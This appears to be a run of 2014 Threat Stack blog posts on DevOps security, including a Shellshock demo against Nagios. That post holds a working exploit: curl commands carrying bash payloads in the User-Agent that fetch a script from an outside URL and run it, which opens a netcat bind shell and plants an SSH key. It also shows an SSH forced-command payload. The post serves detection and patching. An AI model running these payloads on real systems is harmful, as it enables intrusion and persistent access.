Bringing Infosec Into The DevOps Tribe: Q&A With Gene Kim

By Pete Cheslock, Senior Director, Operations and Support at Threat Stack 

Last week, I had a call with Gene Kim, founding CTO of Tripwire and author of The Phoenix Project (see end of post for more details). I've known Gene from the DevOps community for a while now, so we took this time to dive into all things DevOps and Security, which resulted in this great Q&A on what bringing Security into DevOps means for all of us.

Gene kicked off our discussion with a few questions for me: 

Gene:  

How in the world did a nice DevOps person like you end up in the bowels of Infosec?  Usually it works the other way around -- the smart Infosec people flee to saner grounds like DevOps.

Pete:  

While looking for my next opportunity, I wasn’t specifically looking for a job in the Infosec field, or even at security-specific companies, but after getting introduced to the leadership at Threat Stack, it definitely opened my eyes to a whole new world that I felt like I was missing out on.  After spending more time learning about the product and the marketplace, what I saw was actually a convergence of Infosec and DevOps, much like the one we saw when Dev and Ops teams needed to fundamentally change their thought processes in order to win.

What attracted me even more to this space, and the visibility that our product could facilitate, was that we could provide this service to companies that likely didn’t have a dedicated Security team to review and monitor system usage and access.  As we see more and more companies of all sizes undertake these cloud initiatives, deploying net-new projects into places like Amazon, Google, and Azure, Infosec teams become new barriers to progress, in ways similar to the battles between Development and Operations.  I see a world where we can provide the deep insight into services, users, and activities that these companies need, and provide this information to Devs, Ops, and Infosec users of all kinds.  Furthermore, we can embed this visibility and monitoring into the workflow, allowing companies to deploy more scalable and elastic infrastructure.

As companies move towards microservices and containerized deploys, it will be even more critical that the business is continually monitoring and analyzing the scope of changes to their systems.  These monitors can (and should) be integrated early in the development pipeline, as Developers and Operations engineers build these complex, distributed applications.

Gene:  

Here’s a quote from my good buddy Josh Corman:

“If there’s one message that everyone in Infosec should know about the DevOps community, it’s this:  DevOps is waiting for Infosec with open arms.  Come on in, the water is awesome.”

Do you agree with his thesis?

Pete:

It’s been an exciting time watching as DevOps and the overall community around that movement has matured over the past 5 years.  We’ve seen more and more companies of all sizes make amazing organizational changes and fundamentally shift how they do business online.  That being said, many engineers and technical leaders were resistant to that change, fearing “yet another buzzword.”  But these DevOps concepts have now been around long enough for people to see how companies have been able to complete these large transformations.  We’ve seen how to give teams with competing interests a set of shared goals and ideals in order to change how they get work done.

I see the same thing when it comes to the Infosec teams and security-minded folks within companies.  At many of these companies, though, the Security teams don’t have a seat at the table.  They are getting shot down while the rest of the organization is making changes at an incredible rate.

So how can we enable Security and Infosec teams to embrace this new world of continuous deployment and elastic infrastructure?  Much like we saw in the DevOps world, it will come down to a mixture of culture change and improved technical tooling that will facilitate the integration of Infosec into DevOps.  Just as Chef and Puppet enabled teams to more effectively build and deliver highly scalable systems, I see companies like Threat Stack poised to deliver the tools that allow deep insight and visibility into the applications and services being deployed.

I then had some questions for Gene: 

Pete:  

It looks like enterprises like GE Capital, Macy’s, Target, and Nordstrom are early adopters of DevOps in the enterprise; how does Infosec need to change when more of the Dev to Ops value stream migrates to DevOps patterns?

Gene:

This is one of the most exciting things about hosting the DevOps Enterprise Summit.  We have over 50 leaders from large and complex organizations, just like you’ve mentioned, presenting about how they’ve transformed, and how Development, Operations and Infosec have worked together to replicate the amazing outcomes that we typically associate with the DevOps unicorns (e.g., Etsy, Google, Amazon, Netflix, etc.).

Of course, in reality, the unicorns are multi-billion dollar, complex organizations in their own right.  However, when you’re an enterprise horse, you have to deal with very powerful and entrenched silos in Dev, Test and of course, Infosec.

My belief is that we’re going to see the Infosec function transform just like QA/Test is transforming.  In other words, in high-performing DevOps organizations, you very rarely see a QA department that is writing and running the tests.  Instead, QA is helping coach Dev on how to write good test cases and ensuring that the right feedback loops exist so that Dev can validate that they’re achieving the functional and non-functional requirements (like security, for example).

In this world, Infosec is not doing the security scans, nor is it pestering Dev and Ops to look at their reports.  Instead, they are helping create the automated tools so that Dev and Ops can get fast and constant feedback on whether the code and environment are achieving the security objectives.

My favorite example of this is the three-year transformation of the Twitter Infosec function, which started when the @BarackObama account was hacked, resulting in an FTC injunction requiring that Twitter be secure for the next 15 years.  It’s an incredible story of how they integrated Infosec into the daily work of Dev and Ops, with the primary mission of not getting in their way.

Pete:

So how are fast-growing companies implementing the DevOps principles of ownership and accountability while requirements for access tighten (SOC 2, FISMA, PCI, etc.)?

Gene:

It’s often said that the main obstacle for DevOps adoption in large enterprises is Infosec and Compliance, and you can hardly blame them.  For decades, both Dev and Ops seem to have done everything they could to avoid fixing security defects until they’re exposed late in the project lifecycle.

But what every Infosec and Compliance practitioner needs to know is that DevOps is the best thing in at least 20 years to happen to our field.

Here’s why:

  1. When Dev and Ops embrace DevOps principles, we fully embrace all the non-functional requirements, like performance, quality, reliability, and yes, security.

    We want to know when we’re writing or operating code or environments that aren’t secure.

  2. Because DevOps organizations are constantly doing deployments, and those deployments take minutes or hours, the “find to fix” cycle time is very short.  

    So the days of Dev or Ops taking nine months to get an urgent change into production (or maybe a week if we break all the rules, often creating massive chaos and disruption) are coming to an end.

  3. DevOps value streams that sustain tens, hundreds, or even thousands of deployments per day (such as at Netflix, Etsy, Google, etc.) can’t be done without a ton of effective controls.  
    In fact, if you count the number of controls that are working in their deployment pipelines (e.g., automated test suites, security scans, performance testing, manual peer review of changes, deployment validation, etc.), you’ll find FAR MORE controls in a DevOps organization than in a traditional waterfall SDLC.

Wrapping Things Up

Gene Kim is hosting the DevOps Enterprise Summit in San Francisco from October 21st to 23rd. Use promo code “THREATSTACK20” for a 20% discount -- Expires 10/10!

Coming up in just one month, Threat Stack will be hosting Gene Kim at our booth during the AWS re:Invent Conference. Stop by booth #742 on Wednesday, November 12 from 11am-12:30pm to meet Gene and get your free signed copy of The Phoenix Project.

We look forward to seeing you at re:Invent!

 

CVE-2014-6271 And You: A Tale Of Nagios And The Bash Vulnerability

By Jen Andre, Co-Founder

The internet is yet again feeling the aftereffects of another “net shattering” vulnerability: a bug in the shell ‘/bin/bash’ that widely affects Linux distributions and is trivial to exploit. The vulnerability exposes a weakness in bash that allows attackers to execute commands smuggled in through environment variables, and in certain cases allows unauthenticated remote code execution.
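A quick way to check whether a given bash binary is affected is the widely circulated one-liner test for CVE-2014-6271, which smuggles a trailing command in through an environment variable. A patched bash prints only “this is a test”; a vulnerable one also prints “vulnerable”:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"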

Possible vectors for attack include:

  • Authenticated SSH sessions (think of a git server where a user may have SSH account access, but that access is restricted to specific commands -- and suddenly that user is allowed to run arbitrary commands on that box; see the sketch after this list)

  • CGI scripts that invoke or use bash (by setting an HTTP header to code designed to exploit this vulnerability, you can get the web server to run arbitrary commands).
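To make the first vector concrete, here is a hedged sketch (the host and account are made up): sshd exports the client’s requested command as the SSH_ORIGINAL_COMMAND environment variable before invoking the account’s forced command, so if that forced command runs under a vulnerable bash, the payload executes even though the account is locked down to a single command.

# "git" is nominally restricted via ForceCommand in sshd_config, but the
# function definition in the requested command is parsed -- and its trailing
# payload executed -- by a vulnerable bash on the server.
ssh git@git.example.com '() { :; }; /bin/id'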

Already, real-life exploits are emerging and operations people everywhere are scrambling to patch up their Linux servers. Infrastructure that lives in the cloud is especially at risk: the IP ranges for Amazon and other cloud providers are well known, and those servers are already being scanned and attacked by automated systems thousands of times on a daily basis.

At Threat Stack, we specialize in protecting Linux by providing deep auditing and alerting on cloud Linux infrastructure, and as such I thought it would be interesting to demonstrate how a user could leverage this vulnerability in a real-life application via the cgi-bin attack vector.

Naturally, when I asked myself the question: “what vulnerable web app do I know that still heavily uses cgi-bin scripts to drive its web interface?”, Nagios first came to mind. ;) To create a scenario where I could demonstrate this bug, I set up a VM using a Vagrant Nagios setup I found on GitHub, and installed the Threat Stack agent on that “server”.

The first thing I did was set about reading the Nagios web user interface cgi-bin code to look for a possible attack vector. I quickly found a vulnerability that I could pair with the bash bug to provide a compelling exploit. If you drop an “.ssi” file, e.g. “common-header.ssi”, into the right directory, the web app will execute that file in order to generate a custom header or footer (presumably for branding purposes or to include additional data), and it does this with a “system()” call on that file.

Awesome! I dropped a simple bash script into “/usr/share/nagios3/htdocs/ssi/common-header.ssi” to set up conditions for my Nagios “exploit”.
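The exact contents barely matter; a minimal sketch like the following would do, since the file only needs to be a bash script that the CGI executes via system() while the attacker-controlled HTTP headers are sitting in its environment:

#!/bin/bash
# Minimal stand-in header script: merely being run by a vulnerable bash
# with hostile environment variables present is enough to trigger the bug.
echo "<!-- custom header -->"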

I then crafted a simple “exploit” using curl, by setting my user agent to a string that would get executed by this script on my vulnerable server:

#!/bin/sh

# Step 1: download the attacker's script to /tmp/exploit.sh. The payload
# rides in the User-Agent header (-A), which the CGI exports as an
# environment variable that vulnerable bash then executes.
curl -u "nagiosadmin:admin" -A "() { :; }; /usr/bin/curl -o /tmp/exploit.sh https://gist.githubusercontent.com/jandre/ed8ee7ddf1eb19622b3c/raw/3fe85938914c8d90e2d80568a2b9482384a6a680/gistfile1.sh" http://192.168.133.10/cgi-bin/nagios3/summary.cgi

# Step 2: make the downloaded script executable.
curl -u "nagiosadmin:admin" -A "() { :; }; /bin/chmod 755 /tmp/exploit.sh" http://192.168.133.10/cgi-bin/nagios3/summary.cgi

# Step 3: run it.
curl -u "nagiosadmin:admin" -A "() { :; }; /tmp/exploit.sh" http://192.168.133.10/cgi-bin/nagios3/summary.cgi

This exploit works as follows:

  • It makes a curl connection to the “summary.cgi” page served by Nagios.   

  • It sets the User-Agent string to the commands the attacker wants to run: downloading a script, saving it to /tmp/exploit.sh, and then executing that script.

  • The script itself contained some code that spawned a netcat shell binding to bash, added a cron job to make sure netcat is running, and also attempted to add an ssh key to the user’s home directory.

Running the exploit, I immediately saw alerts from Threat Stack about the activity: one alert about new process activity from netcat, and another about Nagios spawning a curl process.

Neither of these things is good! By pivoting into the details about the process that triggered each alert, I was able to get a pretty good picture of what happened.

The first thing I investigated was the netcat process, using the Threat Stack “TTY timeline”, which allows us to reconstruct what happened around that process:

Here, you can see Nagios running, then executing “common-header.ssi”, and then “/tmp/exploit.sh” running, leading up to the spawning of a netcat bind shell -- definitely not good! (Hint: the commands are listed in reverse order)

Walking up the process tree and seeing the processes spawned by the Nagios cgi-bin summary.cgi script confirmed this.

Though this exploit is admittedly contrived, it illustrates one of many attack vectors that could be leveraged in real-life applications that are widely used on Linux today.    

Lessons to be learned are:

  • Patch quickly! This is not a bug to be trifled with. It’s easy to exploit, and this bug is so new that we have no idea what other attack vectors will emerge in the near future.

  • Always be monitoring!  Who knows how long this vulnerability was actually known by nefarious parties. With proper monitoring, you have a good awareness of what network and application activity is happening on your box.   If your web server ever starts spawning a shell, this is a bad thing :)

Continue reading about how security is becoming more and more embedded within ops, and best practices for doing so, here.

Threat Stack vs. Red Hat Auditd Showdown

By Jen Andre

One of the things we like at Threat Stack is magic.  But since magic isn’t real, we have to come up with the next best thing, so we’ve hired one of the libevent maintainers, Mark Ellzey Thomas (we like to call him our ‘mad kernel scientist’), to make our agent the best in its class.

Many of the more savvy operations and security people that use our service are blown away by the types of information we can collect, correlate, and analyze from Linux servers. They say something to the effect of, “I’ve tried to do this with (Red Hat) auditd, with little to no success… how do you guys do it?”  

The Linux audit subsystem is a very powerful way to collect information about system calls and other security-relevant activity.  The best part: no kernel module is required to enable this detailed level of auditing since it’s built right into Linux. You have the option to write a log any time a particular system call happens, whether that be unlink or getpid.  Since the auditing operates at such a low level, the granularity of information is incredibly useful.
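For example (the rule key is arbitrary), you can ask the kernel to log every outbound connect(2) made by any process on a 64-bit system, then pull back everything recorded under that key:

# Log all connect(2) syscalls, tagged with the key "net-connections".
auditctl -a always,exit -F arch=b64 -S connect -k net-connections
# Retrieve the matching records.
ausearch -k net-connections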

Traditionally, people have used the userland daemon ‘auditd’ built by some good Red Hat folks to collect and consume this data. However, there are a couple of problems with traditional open source auditd and auditd libraries that we’ve had to deal with ourselves, especially when trying to run it on performance-sensitive systems and make sense of the sometimes obtuse data that traditional auditd spits out. To that effect, we’ve written a custom audit listener from the ground up for the Threat Stack agent (tsauditd).

We’ve asked our agent engineer, Mark, to make a video that highlights the performance, parsing fixes, and other changes we’ve put into the Threat Stack agent by demonstrating a ‘showdown’ with Red Hat’s auditd. You can view it in all of its glory here (warning: Mark tends to ramble).

Here are a couple of highlights from the video, along with some other facts that make our audit listener special:

1. Performance Enhancements

Many people have tried to use traditional Red Hat auditd in production to do very detailed auditing of user, process, and network syscall activity, but have failed due to the performance impact. We’ve ensured that our agent is responsible with resource utilization through our unique parsing model. In fact, while benchmarking a web server, we saw auditd consume 120% of the CPU. Threat Stack's agent CPU consumption was only 10%!

2.  Output Enhancements

The Linux audit system is special, and by special, I mean it will split a single logical event across many lines in syslog, which you then have to correlate later via your ingestion engine or your log management system.  The key-value format is also cumbersome to parse, and values are often hex-encoded, seemingly at random. We’ve decided that all related events should be grouped together, and have conveniently parsed everything correctly for you. We then transform that into a JSON output format that is much simpler to read and parse.
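To make that concrete, here is a lightly abridged illustration: one command execution scattered across several raw auditd records, versus the same information grouped into a single event (the JSON field names are an invented sketch, not our actual schema).

# Raw auditd: one logical event split across SYSCALL/EXECVE/CWD records,
# correlated only by the shared audit id (2869), with an argument
# hex-encoded (2F746D702F6578706C6F69742E7368 is "/tmp/exploit.sh").
type=SYSCALL msg=audit(1411576223.426:2869): arch=c000003e syscall=59 success=yes comm="curl" exe="/usr/bin/curl"
type=EXECVE msg=audit(1411576223.426:2869): argc=2 a0="curl" a1=2F746D702F6578706C6F69742E7368
type=CWD msg=audit(1411576223.426:2869): cwd="/tmp"

# Grouped, decoded, and emitted as one JSON event:
{"event":"exec","exe":"/usr/bin/curl","args":["curl","/tmp/exploit.sh"],"cwd":"/tmp"}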

3. Network Tooling ("src/dst port")

Tracking network connections across multiple hosts can be a manual and painful process. To make it easier, our agent adds metadata to network connection events to determine where the connection is originating from and where it is going. Our backend is then able to correlate these network events to determine the originating process and potential user activity that caused each network event, so long as the agent lives on both the source and destination server.

This is especially useful for tracking SSH sessions across your environment and debugging what servers are speaking to one another and why.
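As a purely hypothetical sketch (the field names are invented for illustration, not our actual event schema), a correlated cross-host connection event might look like:

{"event":"connect","src_host":"web-3","src_exe":"/usr/bin/ssh","src_user":"alice","dst_host":"db-1","dst_port":22,"dst_exe":"/usr/sbin/sshd"}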

4.  User Activity Auditing

Digging around in server logs to see where a user on your system went is not an easy job. You’d need to manually find the agent and session that a user connected to, yet all the kernel gives us in the traditional auditd logs is a nasty hex-encoded string representing the connection address. On top of that, most of the information logged by auditd is not really relevant, and it is hard for the human eye to parse. To correct that, we’ve designed Threat Stack to store the events, activity, and commands associated with a logged-in user, and to automatically reconstruct this information into a clean, compact, and readable timeline.

Stay tuned to read about some of the other engineering feats we are accomplishing at Threat Stack!

8 Patterns For Continuous Code Security

Guest post by Chris Wysopal, CTO at Veracode 

This is the fifth installment in our series of weekly blog posts that dives into the role of SecDevOps. This series looks into why we need it in our lives, how we may go about implementing this methodology, and real life stories of how SecDevOps can save the Cloud.

 

Best practices of secure agile teams

According to the 2014 Verizon Data Breach Investigations Report (DBIR), web applications are the #1 attack vector leading to data breaches.

So deploying insecure web applications into production can be risky -- resulting in potential loss of customer data, corporate intellectual property and/or brand value.

Yet many organizations still deploy public-facing applications without assessing them for common and easily-exploitable vulnerabilities such as SQL Injection and Cross-Site Scripting (XSS).

Why?  Because traditional approaches to application security are typically complex, manual and time-consuming – deterring agile teams from incorporating code analysis into their sprints.

But it doesn’t have to be that way.  By incorporating key SecDevOps concepts into the Software Development Lifecycle (SDLC) – including the use of cloud-based services with API-driven automation, centralized policies and tighter collaboration and visibility between security and DevOps teams – we can now embed continuous code-level security and assessment into our agile development processes.

In our own development environment, Veracode has adopted secure agile processes with the goal of rapidly delivering code without sacrificing security. Along the way we’ve uncovered eight patterns that lead to successful secure agile development.

These eight patterns work together to transform cumbersome waterfall methodologies into efficient and secure agile development.

1. Think like a developer.

In agile environments, developers write code based on work committed in the current sprint. At various points in the process, our developers upload code to Veracode’s cloud-based application security service, directly from their IDEs. The code is then analyzed and the results downloaded to their development environments, allowing them to address vulnerabilities before check-in. By finding vulnerabilities during coding instead of during a separate security hardening sprint, developers need not switch context to work on code written long ago. This saves time and preserves velocity.

2. Find it early. Fix it early.

Too often, security testing is only implemented at the end of a sprint, as a pre-deployment gateway or checkpoint. This approach requires a separate security hardening sprint after the team has delivered a functionally-complete release candidate. This results in a hybrid waterfall/agile process instead of enabling the best practice of agile — completing all the work during the sprint.

In comparison, frequent assessments allow the team to identify and remediate release blockers early in the cycle — when they’re easier and less expensive to fix. This also reduces the overall risk to successfully delivering the team’s payload. This only works because most Veracode assessments finish within hours or overnight (in fact, 80% of assessments for Java and .NET applications are completed in less than 4 hours). That means that continuous security assessments can fit into the one to two week sprint that’s typical in many development organizations.

3. Use multiple analysis techniques for optimum coverage and accuracy.

The appropriate combination of multiple analysis techniques — ideally in a single centralized platform with consistent policies, metrics and reporting — gives organizations the broadest view of application security.

Binary static analysis – also known as “white box testing” or “inside out testing” – analyzes data and control paths without actually executing the application, looking for vulnerabilities such as SQLi and XSS.

In comparison, dynamic analysis (DAST) – also known as “black box” or “outside in” testing – identifies exploitable vulnerabilities at runtime, during pre-production QA/staging.

Manual penetration testing looks for vulnerabilities that can only be found by humans, such as Cross-Site Request Forgery (CSRF) or business logic issues.

Of course, most modern applications aren’t built from scratch but rather assembled from a mixture of custom code and open source components and frameworks. Software composition analysis (SCA) is a handy way of identifying which components are used where – and which are known to be vulnerable.

4. Automate to blend in.

Blending in with developers’ automated toolchains means leveraging tools they already use. Automation inside the IDE (Eclipse) is used to build, upload, scan and then download results, which are shown against the code inside the editor for easy remediation. Automation at the team or release candidate stage allows the build server (Jenkins) to automatically upload build artifacts for assessment, using Veracode APIs. API-driven automation in the bug tracking system (JIRA) downloads results and manages the vulnerability lifecycle. Tickets for vulnerabilities are then triaged through the same process used for all bugs. When security assessments are blended in, developers don’t switch context – and they work more efficiently.
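As a hedged sketch of the build-server step (the jar name, flags, and credentials below are illustrative placeholders; the real invocation comes from Veracode’s API wrapper documentation), a Jenkins job might shell out after a successful build:

# Upload the new build artifact and kick off a static scan.
java -jar veracode-api-wrapper.jar -action UploadAndScan \
  -vuser "$VERACODE_USER" -vpassword "$VERACODE_PASS" \
  -appname "MyApp" -version "build-${BUILD_NUMBER}" -filepath target/myapp.war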

5. Play in the sandbox.

The sandbox is a way for individual developers or teams to assess new code against the organization’s security policy, without affecting policy compliance for the current version. One way to think about an assessment sandbox is to consider it as a branch inside the application. Developers can scan the branch and understand whether it would pass the current policy. Each team can also have a sandbox for merging multiple branches to assess the integration.

6. Avoid replicating vulnerabilities.

If you think about how developers work, there’s always a bit of copy-and-paste going on. Developers look at code and say, “All right, I’m going to use that pattern.” When vulnerabilities get replicated across the code base, it magnifies risk across projects. Then it becomes a big development effort – “security debt” – to clean up those vulnerabilities.

7. Learn from constant feedback.

Direct interaction between developers and detailed vulnerability feedback enables self-reflection. People begin to see their own coding habits and gain insight into how to develop more secure ones. The “aha” moment comes when a developer says “Oh, I shouldn’t have coded it this way because as soon as I upload it I’m going to see the same results.” Continuous feedback means they’re more likely to reuse secure patterns and avoid insecure ones.

8. Be transparent about security risk via policies.

We use labels to identify any vulnerability that violates our standard corporate security policy (such as “No OWASP Top 10 Vulnerabilities”) as a release blocker. This raises our visibility into vulnerabilities and allows us to triage every application-layer threat before release. Triage involves answering questions such as: Do we need to remediate this vulnerability? Can we mitigate it instead, and if so, how? Is this a risk we’re willing to accept? Visibility enables a pragmatic discussion about risk within the normal agile sprint management process.

Adopting these eight patterns has helped Veracode become more efficient, secure and successful in delivering code with short delivery cycles – without sacrificing security.

Stay tuned next Wednesday for our sixth installment in this series as we continue to dive deep into SecDevOps implementation. 

 

About Chris Wysopal 

Chris Wysopal, co-founder and CTO of Veracode, is recognized as an expert and a well-known speaker in the information security field. He has given keynotes at computer security events and has testified on Capitol Hill on the subjects of government computer security and how vulnerabilities are discovered in software. At Veracode, Mr. Wysopal is responsible for the security analysis capabilities of Veracode technology. He can be found on Twitter as @WeldPond.

 

How DevOps and Models Enhance Behavioral Detection

By Aaron Botsis

This is the fourth installment in our new series of weekly blog posts that dives into the role of SecDevOps. This series looks into why we need it in our lives, how we may go about implementing this methodology, and real life stories of how SecDevOps can save the Cloud.

 

In an earlier article, Behavioral Threat Monitoring Without Models, I explained how you could use our Cloud Sight product to deploy a pre-trained behavior model on newly deployed systems. For the fourth installment of this SecDevOps series, I’m going to talk about how to further integrate security into DevOps processes and how these models work together in the bigger picture.

What are these models?

Ok, ok. I keep saying “models”, but what are they? How do they work? And most importantly, why do they matter?

We can use models to detect changes in system behavior with algorithms and math; Cloud Sight actually builds several different types of these models. The great thing is that the models don't even need to be that complicated. Why?

If you have any data scientist friends:

1. They’ll tell you that more data beats a better algorithm.

2. Wait, data scientists have friends?

So what can we do with more data? Let’s start with “processes with network activity”. For any group of servers, Cloud Sight builds a list of processes that are talking on the network. Once it’s finished learning, it starts to monitor for new processes. This is a simple but extremely effective technique to identify behavior variations. In fact, it’s so effective that in a 28M event sample set of accept(2) and connect(2) system calls, we saw just 321 unique executable names across our customers! We can apply similar techniques for other data such as process owner, parent process name, etc.
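A toy version of that first model fits in two shell commands (a sketch only: it assumes a modern Linux with ss and GNU grep, needs root to see other users’ processes, and real models track far more than executable names):

# Training: record the names of processes currently talking on the network.
ss -tunap | grep -oP 'users:\(\("\K[^"]+' | sort -u > baseline.txt
# Monitoring: print any network-active process name absent from the baseline.
ss -tunap | grep -oP 'users:\(\("\K[^"]+' | sort -u | comm -13 baseline.txt -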

Why this is Good

Back in the dark ages, it was difficult to ensure a group of systems that were functionally similar actually behaved in a consistent and similar way. But then there was light. Thanks to DevOps and configuration management, system behavior is now a fairly consistent (and measurable) thing. Web servers that are all configured the same actually do the exact same thing, the exact same way. This is an epic win for security, my hipster brethren!

“I took this system to its maximum potential. I created the perfect system!”

 

“Epic Win?”

Totally. Here’s why: Imagine these models can be created, destroyed and tested programmatically, alongside your existing development processes.

We can start by training these models during our continuous integration tests. We know the environment is pristine, and we’re already testing all of the things. Why not train our models on which behavior is “good” while we’re at it? It’s like a self-generating, infrastructure-wide whitelist.

Now we can apply those behaviors to systems we deploy for production. Anything that deviates from what we tested is likely an intrusion. But even if it’s not, it could inform us of imperfections in the system. Maybe we forgot to test something. Maybe there’s a corner case that only affects production for some reason. Maybe something’s running away because of an unidentified failure elsewhere in the system, consuming precious elastic resources.

Finally, once we’ve iterated and ironed everything out, we can add automated chaos-monkey-style remediation to the mix. When a system deviates from its expected behavior, quarantine and replace it automatically.
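A hedged sketch of that last step using the AWS CLI (the instance ID and security group are placeholders): cut the misbehaving instance off by moving it into an isolated security group so it can still be inspected, then terminate it and let your provisioning pipeline replace it.

# Quarantine: swap the instance into a no-traffic security group for forensics.
aws ec2 modify-instance-attribute --instance-id i-0123456789abcdef0 --groups sg-quarantine
# Replace: terminate it; autoscaling or config management brings up a fresh one.
aws ec2 terminate-instances --instance-ids i-0123456789abcdef0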

Bringing it all Together

It used to be that “deploy” meant “run make install”. The number of interaction points between applications was minimal and easy to grok. Today's infrastructures are more complex than ever, and DevOps is showing huge value in quick iteration. Thanks to configuration management, applications and the infrastructure supporting them are more consistent than ever. So it only makes sense to leverage behavioral monitoring to iterate quickly without forgetting lessons learned from the past while protecting the infrastructure at the same time.

Stay tuned for next week’s SecDevOps blog post featuring Chris Wysopal, Veracode’s CTO, on code analysis as part of CI.

Who Gets Access to Production?

By Sam Bisbee, CTO

This is the third installment in our new series of weekly blog posts that dives into the role of SecDevOps. This series looks into why we need it in our lives, how we may go about implementing this methodology, and real life stories of how SecDevOps can save the Cloud.

Remote access to production machines is a long-contested battlefield that has only gotten uglier since the rise of Software as a Service, which has obliterated the line between building the system and running the system. This has given rise to new methodologies, the most popularly touted being DevOps, which is really just an awful way of communicating that everyone is responsible for running the system now. One critical implementation detail that smaller SaaS companies have always understood, due to hiring constraints, is that the entire technical staff is required to be on call. Yes, even the engineers, developers, or whatever else you call them.

The New Policy

“Lock out the developers” is not an acceptable policy anymore. Developers inherently build better systems when they experience running them. Who would allow a bug to linger if it continuously woke them up throughout the night? This pain was not felt widely enough in the previous “throw it over the wall to operations” world. I can sense desperation rising from the PMs over their kanban story velocity, “If an engineer is on call, then they won’t be able to write code!” While this statement is factually accurate, the sentiment is not.

First, operations has an equally important and lengthy work queue. Second, those paging alerts are likely the most important bugs regardless of whether they’re an uncaught exception (engineering issue) or RAID alarm (operational issue). This typically confounds those new to the SaaS world because they have not fully grasped the ramifications of the Service with a capital “S”. The Service is always on and is the product through which you deliver value. This is one of the best examples of how SaaS companies are so much different culturally and operationally than companies that “ship” product. You are not running an IT department.

Don’t Over Correct

This remote access policy may seem like an over correction, which is why proper controls are critical. One of the most cited fears for granting more people access is the lack of change control. When you apply this fear to developers, what people really mean is that they are afraid of hot patches. This is completely and utterly reasonable.

Hot patches decrease visibility into the system, slowing down or outright preventing the ability to debug. The worst-case scenario is a hot patch actually damaging the system or corrupting user data, which is exponentially more likely due to the lack of testing. The technical community should fully understand by now that “it worked on my laptop” or “it shouldn’t do that” are not reasonable statements when releasing. The only true prevention for hot patching, especially when implementing a populist remote access policy, is to create a frictionless release mechanism. Make it trivial for your teams to build, test, and initiate a staggered release into any of your environments. Ideally your build server is testing every push to your master git branch and anyone can promote a successful build from that server.

Trust but Verify

If frictionless releases are our trust, then accordingly we must verify. Enter monitoring. Techniques such as the Pink Sombrero are good (digital sombreros are better), but you must introduce continuous security monitoring into your environment. For ages there have been tools and techniques that do this, but most teams do not employ them because of their complexity, outdated implementation (taking hashes of your entire multi-TB filesystem in an IO bound cloud or virtual environment is asinine), and volume of false positives. It does not have to be so complicated though. For example, alerting when a user other than chef changes files in your production server’s application directory is an easy first step that a team of any size can easily grasp.
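One hedged way to express that rule with the stock Linux audit tooling (the path and uid are examples, and Threat Stack expresses this differently under the hood): watch the application directory for writes and attribute changes by any logged-in user other than the deploy user.

# Flag writes/attribute changes under /srv/app by any interactive login
# except the deploy user (uid 900 here); unset auids (daemons such as a
# chef run) are excluded by the auid!=-1 filter.
auditctl -a always,exit -F dir=/srv/app -F perm=wa -F auid!=900 -F auid!=-1 -k unauthorized-change
ausearch -k unauthorized-change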

For those who are concerned about access to customer data, whether it be PII or something less toxic, this remote access policy does not apply to that data, as it should live in a segregated environment. They are also likely concerned with passing audits, and the prospect of listing their entire technical team as having production access is not appealing. In such scenarios, non-operators should be locked out of production unless they are on rotation. Adding and revoking their SSH public key from the gateway on demand can make controlled access easier, as sketched below.
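A minimal sketch of that key rotation (the gateway host, account, and key are placeholders): append the engineer’s public key on the gateway when their rotation starts, and strip it when the rotation ends.

# Grant: add alice's key to the on-call account on the SSH gateway.
ssh oncall@gateway.example.com 'cat >> ~/.ssh/authorized_keys' < alice.pub
# Revoke: remove it (matched by its comment field) when her rotation ends.
ssh oncall@gateway.example.com "sed -i '/alice@example.com/d' ~/.ssh/authorized_keys"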

You Get What You Need

All of this is to say that collectively we are still trying to figure out the security balance in the technical community. Too often people want security, but see it as prohibiting productivity so they punt. This is unfortunate for the obvious reasons, but also because properly operationalized security begins to enhance the developer’s and operator’s experience. Tools are leveraged that make the system easier to run and control. Different monitoring solutions are installed that make the system easier to debug and verify. And, everyone gets access to production.

Stay tuned next Wednesday for our fourth installment in this series as we continue to dive deeper. Until then, be sure to check out our first and second posts in the series.

Threat Stack Names Executives As Company Brings Innovative Cloud Security Service to Market

We're excited to announce today that we have added several key members to our management team.  Sam Bisbee has joined as CTO; Chris Gervais as VP, Engineering; and Pete Cheslock as Senior Director, Operations and Support.

“Threat Stack is at a really exciting point in time, as we come off a highly successful beta program and prepare to launch Cloud Sight into the market. Our management team has deep experience across enterprise, cloud, SaaS and security, and a track record for successfully bringing innovation to market.  We’re thrilled to have attracted an all-star team.”

- Doug Cahill, CEO of Threat Stack

About the Executive Team

Sam Bisbee is a senior technologist who brings experience and expertise in delivering highly scalable distributed systems via SaaS.  Most recently Sam was CXO of Cloudant, a leader in Database as a Service (DBaaS) technology; before that he held key technology positions at Bocoup and Woopid.

Chris Gervais has led technology teams developing large, scalable, enterprise-grade solutions and bringing SaaS offerings to market.  Before Threat Stack, Chris was CTO and SVP, Engineering at LifeImage, a platform for securely sharing medical images; and VP, Engineering at Enservio, a SaaS application and analytics platform for insurance carriers.

Pete Cheslock has a record of supporting SaaS customers with highly reliable and scalable solutions.  Pete was previously Director of DevTools at Dyn, a provider of network traffic management and assurance solutions; and before that he was Director of Technical and Cloud Operations for Sonian, a cloud-based archiving platform.

“This team is a testament to Threat Stack’s unique technology and the big problem that it addresses. Elastic and dynamic infrastructures, and the services that run on them, are really difficult to monitor and protect.  Threat Stack has cracked the code.”

- Chris Lynch, Chairman of the Board and a partner at Atlas Venture

Our flagship product, Cloud Sight™, is the first and only intrusion detection SaaS offering purpose-built to provide elastic cloud infrastructure with comprehensive protection, detection, and response against malicious threats.  Cloud Sight has been in a highly active beta program, which has resulted in multiple customer case studies, including Populi, a cloud-based college administration platform, and the University of Hawaii at Manoa.  Beta participation ranged from SaaS vendors to MSPs and enterprises running in most major cloud service providers, including Amazon Web Services and Rackspace, as well as in private and hybrid-cloud deployments. Cloud Sight will be commercially available this fall.

Interested in trying out Threat Stack? Request an invite to our beta: https://www.threatstack.com/request